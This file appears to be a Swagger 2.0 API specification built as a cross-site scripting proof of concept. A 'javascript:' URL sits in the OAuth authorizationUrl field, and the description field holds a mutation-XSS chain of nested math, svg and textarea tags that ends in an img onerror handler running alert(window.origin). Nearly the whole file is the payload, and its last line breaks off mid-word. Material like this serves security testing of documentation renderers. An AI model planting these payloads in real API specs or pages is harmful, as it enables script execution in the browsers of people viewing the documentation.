swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: jAvascript:prompt('https://google.com')
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize!12345 <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
